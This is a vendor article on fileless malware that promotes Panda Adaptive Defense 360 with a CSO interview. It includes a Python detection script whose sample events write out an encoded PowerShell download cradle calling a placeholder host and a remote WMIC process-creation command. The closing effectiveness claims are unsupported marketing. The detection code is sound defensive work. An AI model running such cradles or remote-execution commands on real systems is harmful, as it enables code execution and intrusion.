Defending Against Fileless Malware with Panda Adaptive Defense 360
According to WatchGuard’s Q4 2020 Internet Security Insights Report, fileless malware attacks rose 888% in 2020 over the prior year. The figure is based on a year’s worth of endpoint threat intelligence collected from WatchGuard Panda products. Fileless malware, also known as “living off the land” malware, is a class of threat that does not enter a network as a traditional file. This means the malware is never written to disk and generally goes unnoticed by anti-virus scans. Because it resides only in memory, successful endpoint protection must analyze processes as they execute. The ability to analyze processes as they execute is a component of advanced endpoint protection known as Endpoint Detection and Response (EDR). In a recent interview Corey Nachreiner, the Chief Security Officer at WatchGuard Technologies, explains the benefits of EDR in fending off fileless attacks.
Most antivirus or endpoint protection (EPP) is all about preventing malware. Pre-execution, catching the malware before it even has a chance to do anything bad, and you absolutely want that type of protection. But the truth is, because of evasive attacks, there are some malware instances that will actually run, and that’s where EDR or endpoint detection and response comes in. It’s not necessarily looking just at files. It’s looking at the processes that are running. It’s looking at tricky, very technical things like what’s being injected in other processes running on your computer. It looks at some of the scripts being run and, long story short, it’s better capable of catching these fileless attacks. So again, huge rise in 2020, but the takeaway for your audience is to consider things like EDR, make sure your endpoint protection suite includes this post-execution and fileless detection capability, where it has a better chance of catching these sorts of attacks.
Fileless malware can also be referred to as “living off the land” (LOTL) because the attackers cannot bring many resources or tools with them and still remain undetected. They must instead look within the network for existing tools they can use for the attack. Using native tools already present on the system to accomplish the attack objectives allows LOTL attacks to go unnoticed by antivirus. Often the attackers can reside on a system for weeks or months without being detected while they exfiltrate or destroy data and disrupt operations. Some of the most common native tools used in LOTL attacks are Windows PowerShell, the WMI command-line tool, and the credential-dumping tool Mimikatz. Monitoring these otherwise benign tools as they execute malicious commands is the only way to stop a LOTL attack.
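As an added illustration of the kind of execution monitoring this paragraph calls for (example code written for this article, not part of the Panda Adaptive Defense 360 product), the Python below applies a few heuristics to constructed Sysmon-style process-creation events: it decodes a PowerShell -EncodedCommand argument so the real script can be inspected, flags in-memory download cradles, and catches process creation through WMIC and shells spawned by Office. The event field names, sample values and rule names are assumptions.

```python
import base64
import re

# PowerShell accepts -e/-ec/-enc/-EncodedCommand; the argument is base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(r"net\.webclient|downloadstring|invoke-expression|\biex\b", re.I)
WMI_SPAWN = re.compile(r"process\s+call\s+create", re.I)
OFFICE = ("winword.exe", "excel.exe", "powerpnt.exe")
SHELLS = ("powershell.exe", "cmd.exe", "wmic.exe")

def decode_encoded_command(command_line):
    """Return the script hidden behind -EncodedCommand, or None if absent or undecodable."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None

def analyze_event(event):
    """Apply LOTL heuristics to one process-creation event; returns (rule, detail) pairs."""
    image, parent = event["image"].lower(), event["parent_image"].lower()
    cmd = event["command_line"]
    findings = []
    if image.endswith("powershell.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append(("powershell_encoded_command", decoded))
        # Match the cradle in the decoded script, not only in the visible command line.
        if CRADLE.search(decoded or cmd):
            findings.append(("powershell_download_cradle", "fetch-and-execute without touching disk"))
    if image.endswith("wmic.exe") and WMI_SPAWN.search(cmd):
        findings.append(("wmi_process_create", cmd))
    if parent.endswith(OFFICE) and image.endswith(SHELLS):
        findings.append(("office_spawned_shell", parent))
    return findings

# Constructed sample telemetry for illustration, not real logs; example.invalid never resolves.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc "
                     + base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()},
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": 'wmic /node:"fileserver01" process call create "cmd.exe /c whoami"'},
    {"parent_image": r"C:\Windows\explorer.exe",  # benign scheduled script: should raise nothing
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]
```

Running `analyze_event` over each entry in `SAMPLE_EVENTS` flags the first two and stays silent on the third, which is the behaviour a monitoring rule needs: the tool is trusted, its use is judged at execution time.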
The trend in these types of advanced campaigns is that attackers are becoming far more selective in their choice of victim. Once they identify a target with a high probability of paying a larger ransom, they are willing to spend more time and employ more advanced techniques such as spear-phishing or LOTL in order to execute the attack. As Corey Nachreiner points out, if your data is critical and you have the ability to pay quickly, you could be a target.
It could be a healthcare provider or hospital that needs patient records. It could be a manufacturing firm where every hour down causes issues. It could be governments or really any company that really needs its data critically for whatever it’s doing. They have even been known to target cyber insurance companies because if they can find people that are insured, they have an idea that these are people that might pay the ransom.
— Corey Nachreiner
In order to fill the gap between traditional anti-virus and fileless attacks, security solutions must combine Endpoint Protection Platform (EPP) and Endpoint Detection & Response (EDR) capabilities. WatchGuard’s flagship solution, Panda Adaptive Defense 360, combines EPP and EDR and also provides a Zero-Trust Application Service through 100% classification of all applications, programs, and executables. Panda Adaptive Defense 360 also includes a Threat Hunting Service that detects the anomalous usage of trusted applications on endpoints. In both third-party testing and the years of experience gained through customer deployments, the effectiveness of the Adaptive Defense solution in combating all types of known, unknown, and zero-day threats, in-memory attacks, and even fileless attacks has been proven repeatedly.